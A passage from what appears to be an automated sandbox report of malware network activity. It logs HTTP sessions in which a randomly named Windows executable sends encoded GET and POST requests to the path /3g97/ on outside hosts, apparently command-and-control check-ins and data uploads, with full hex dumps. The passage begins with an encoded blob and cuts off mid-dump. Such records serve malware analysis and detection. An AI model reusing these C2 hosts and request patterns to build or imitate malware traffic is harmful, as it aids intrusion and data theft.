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
                                                                                              Apr 24, 2024 07:28:22.926213980 CEST1079INHTTP/1.1 403 Forbidden
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Server: Pepyaka
                                                                                              X-Wix-Request-Id: 1713936502.82334837651244156285
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Wed, 24 Apr 2024 05:28:22 GMT
                                                                                              X-Served-By: cache-bur-kbur8200108-BUR
                                                                                              X-Cache: MISS
                                                                                              X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb6JxSuEU9PIuIbre7VUIJiy
                                                                                              Via: 1.1 google
                                                                                              glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.44977334.149.87.45801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:25.424794912 CEST460OUTGET /3g97/?12l42=xT2trqCQSb0YGfwnfC7AAWCSgoebgz86z2nMETOowAc4zyKeScBuNk+zQrcmduROogVqNtfeQZVF2OAhYZAs5wKafa9/anE/xTNtRCFpw92mm1bEow/bC00=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.corvidemporium.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:28:25.682203054 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              X-Wix-Request-Id: 1713936505.5353489358346334572
                                                                                              Age: 0
                                                                                              Server: Pepyaka
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Wed, 24 Apr 2024 05:28:25 GMT
                                                                                              X-Served-By: cache-bur-kbur8200142-BUR
                                                                                              X-Cache: MISS
                                                                                              Vary: Accept-Encoding
                                                                                              Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_sea1_g
                                                                                              X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb690urzQo8znCIRFiqxF/nR,2d58ifebGbosy5xc+FRalsfKRjkvyVNx6F/MgVi8KAXjsEimH09mQSUzjf+MlEbWutsYt+BqfLnLyvHX+3ZU2A==,2UNV7KOq4oGjA5+PKsX47HqjR+6CNmn/ng3r7CWVjR4=,R8nVwPJv9QJL1m78OROO+IV9oD+TXFc2vEfvXLHbcEY=,znHLAI6vxugFKypFMbJjolwf8wWTJVQybTnH7MNlwkYSO5XmrrCSQNDehIjmfew3bNsG/ydVSs9vBX3FVb1aSQ==
                                                                                              Transfer-Encoding: chunked
                                                                                              Via: 1.1 google
                                                                                              glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                              Connection: close
                                                                                              Data Raw: 62 66 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e
                                                                                              Data Ascii: bf1 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" conten
                                                                                              Apr 24, 2024 07:28:25.682255030 CEST1289INData Raw: 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20
                                                                                              Data Ascii: t=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.para
                                                                                              Apr 24, 2024 07:28:25.682342052 CEST1289INData Raw: 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73
                                                                                              Data Ascii: r-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public
                                                                                              Apr 24, 2024 07:28:25.682379961 CEST132INData Raw: 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e
                                                                                              Data Ascii: ">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.44977431.186.11.254801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:32.187218904 CEST737OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.levelstep.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.levelstep.online
                                                                                              Referer: http://www.levelstep.online/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 52 6a 67 59 4d 67 7a 53 4b 6a 79 49 57 4c 4b 77 57 63 4a 76 47 36 33 4c 58 34 78 46 72 52 43 37 52 33 31 4a 31 6a 46 42 69 67 34 30 6f 33 32 6d 44 57 49 49 70 45 31 46 53 4c 51 68 6e 42 49 6c 71 56 54 36 4b 68 56 44 65 6d 35 72 76 58 6f 43 49 30 48 2f 6d 70 52 6f 49 56 70 6d 49 52 55 55 4d 44 74 68 58 45 2b 47 32 74 6e 74 7a 55 4e 44 2b 66 76 39 4b 70 65 6e 7a 67 37 61 71 62 51 36 76 52 35 43 6a 2f 63 6d 65 50 31 68 66 4e 43 7a 34 2b 62 57 33 4a 4d 4d 48 30 6a 47 31 46 44 6c 79 61 4d 43 4a 2b 42 4a 59 61 78 37 56 4a 45 69 4d 73 79 6e 53 58 4f 70 55 42 30 47 58 74 7a 74 62 41 3d 3d
                                                                                              Data Ascii: 12l42=RjgYMgzSKjyIWLKwWcJvG63LX4xFrRC7R31J1jFBig40o32mDWIIpE1FSLQhnBIlqVT6KhVDem5rvXoCI0H/mpRoIVpmIRUUMDthXE+G2tntzUND+fv9Kpenzg7aqbQ6vR5Cj/cmeP1hfNCz4+bW3JMMH0jG1FDlyaMCJ+BJYax7VJEiMsynSXOpUB0GXtztbA==
                                                                                              Apr 24, 2024 07:28:32.545361042 CEST469INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:55 GMT
                                                                                              Server: Apache/2.2.15 (CentOS)
                                                                                              Content-Length: 289
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              34192.168.2.44977531.186.11.254801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:35.078109980 CEST757OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.levelstep.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.levelstep.online
                                                                                              Referer: http://www.levelstep.online/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 52 6a 67 59 4d 67 7a 53 4b 6a 79 49 48 61 61 77 56 2f 68 76 58 61 33 4b 4b 49 78 46 6c 78 43 2f 52 32 4a 4a 31 69 52 72 69 79 63 30 6f 56 2b 6d 43 58 49 49 38 45 31 46 4b 62 52 72 36 52 49 36 71 56 76 79 4b 67 70 44 65 69 52 72 76 53 55 43 49 46 48 2b 6e 35 52 71 41 31 70 67 46 78 55 55 4d 44 74 68 58 45 71 73 32 74 2f 74 7a 6c 39 44 2f 2b 76 79 4a 70 65 34 30 67 37 61 75 62 52 39 76 52 35 77 6a 39 6f 4d 65 4e 39 68 66 4a 47 7a 34 71 48 56 74 5a 4e 48 61 6b 6a 53 6c 6c 53 53 79 50 78 33 57 39 6c 7a 61 37 73 59 5a 76 56 34 64 64 54 77 41 58 71 61 4a 47 39 79 61 75 4f 6b 41 4b 76 76 6a 51 55 35 69 76 7a 36 64 66 67 54 79 38 64 4b 54 6b 30 3d
                                                                                              Data Ascii: 12l42=RjgYMgzSKjyIHaawV/hvXa3KKIxFlxC/R2JJ1iRriyc0oV+mCXII8E1FKbRr6RI6qVvyKgpDeiRrvSUCIFH+n5RqA1pgFxUUMDthXEqs2t/tzl9D/+vyJpe40g7aubR9vR5wj9oMeN9hfJGz4qHVtZNHakjSllSSyPx3W9lza7sYZvV4ddTwAXqaJG9yauOkAKvvjQU5ivz6dfgTy8dKTk0=
                                                                                              Apr 24, 2024 07:28:35.435842991 CEST469INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:58 GMT
                                                                                              Server: Apache/2.2.15 (CentOS)
                                                                                              Content-Length: 289
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              35192.168.2.44977631.186.11.254801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:28:37.980017900 CEST10839OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.levelstep.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.levelstep.online
                                                                                              Referer: http://www.levelstep.online/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 52 6a 67 59 4d 67 7a 53 4b 6a 79 49 48 61 61 77 56 2f 68 76 58 61 33 4b 4b 49 78 46 6c 78 43 2f 52 32 4a 4a 31 69 52 72 69 79 55 30 70 6d 6d 6d 4e 55 51 49 75 30 31 46 47 37 52 6f 36 52 49 33 71 56 48 32 4b 67 6c 35 65 67 5a 72 75 77 4d 43 44 52 7a 2b 2b 4a 52 71 4d 56 70 6c 49 52 55 42 4d 44 38 6d 58 45 36 73 32 74 2f 74 7a 6e 6c 44 35 76 76 79 46 4a 65 6e 7a 67 37 65 71 62 51 61 76 52 78 4b 6a 39 73 32 65 2b 46 68 66 74 69 7a 2b 66 62 56 31 4a 4e 46 5a 6b 69 56 6c 6c 65 4e 79 50 45 49 57 38 42 5a 61 37 49 59 4b 49 34 59 59 50 6e 39 65 46 7a 46 52 30 64 6a 64 63 32 30 48 74 76 71 75 68 45 4f 31 74 44 49 59 2b 4d 63 70 63 78 77 4b 52 74 55 38 6b 35 43 71 39 53 33 66 75 66 61 53 4c 4b 6a 33 47 38 41 50 62 59 47 30 33 79 6f 2f 43 49 39 79 4f 57 57 34 4b 39 55 4e 69 4d 6b 6a 39 30 43 66 68 49 75 37 39 57 56 48 32 36 6e 4d 62 30 56 76 4b 52 33 36 6a 78 67 71 7a 74 4f 61 4e 79 6e 49 61 32 74 6a 45 69 61 45 57 74 38 66 77 6f 69 57 6e 7a 53 6b 51 50 79 37 5a 37 77 56 70 4b 55 67 49 44 59 65 46 6a 57 67 33 51 30 43 55 31 55 46 4f 41 36 31 74 67 6b 39 2b 61 72 66 74 64 4c 46 6e 55 45 58 31 71 57 52 37 31 46 4e 73 51 31 4a 62 35 44 46 50 56 51 42 35 69 63 32 72 41 61 69 71 6d 36 76 4c 6e 47 76 63 77 79 39 66 4c 5a 39 6f 57 4f 48 38 76 35 64 4d 72 2b 75 58 2f 73 79 58 45 34 41 52 4d 4f 70 67 45 4d 75 68 45 6f 33 47 64 59 4c 31 34 50 4d 2f 32 7a 2b 45 32 73 36 70 77 30 31 4f 2f 43 67 64 73 5a 49 65 46 41 58 2b 69 73 6f 70 4d 43 73 4b 4e 4d 55 38 2b 6e 34 59 78 49 30 68 37 4e 41 77 77 4a 36 56 44 45 34 74 35 59 61 61 4a 36 77 33 36 39 4a 77 37 6b 51 43 65 2b 34 6c 45 79 78 65 6e 46 46 33 51 64 59 4b 61 70 67 46 49 30 57 38 38 50 55 2b 62 44 2f 65 47 4f 61 4f 4f 68 51 79 36 30 54 7a 4f 54 33 64 53 33 72 58 57 4c 30 6a 56 35 44 4b 2f 36 56 71 68 57 38 50 78 62 33 4e 72 50 61 51 66 75 6c 2f 54 65 76 42 39 46 74 4a 6f 65 37 39 35 35 48 47 66 31 48 6d 6e 58 36 66 77 36 75 44 71 69 4f 6c 30 44 34 55 71 61 6a 56 51 69 61 51 78 66 75 67 4e 73 30 61 7a 4b 56 45 78 35 4f 42 34 36 4e 78 58 47 52 6e 33 70 47 74 64 52 47 5a 30 49 65 42 74 4d 51 78 6c 68 42 39 35 73 54 34 69 4a 2f 52 45 33 63 4e 44 56 4a 6c 6e 53 35 64 51 61 77 36 56 35 63 73 45 58 6b 39 38 79 63 70 68 41 50 5a 43 35 57 68 6d 39 4c 30 55 65 37 72 79 74 77 55 6d 47 72 43 70 66 6a 66 75 51 73 2f 71 4f 52 6b 57 35 4e 33 4b 37 58 59 45 31 61 71 73 48 2b 36 4d 69 37 53 31 4b 48 4f 4f 71 43 2b 51 63 4b 65 55 45 66 33 73 47 65 62 79 34 76 61 4b 54 69 30 2b 41 35 31 61 39 30 62 4d 72 72 71 79 57 33 71 63 50 41 49 51 63 45 33 63 45 7a 41 54 4d 4a 52 51 77 64 53 30 78 71 6a 61 35 70 4d 73 56 2f 41 79 64 52 54 76 4d 6c 43 47 62 33 55 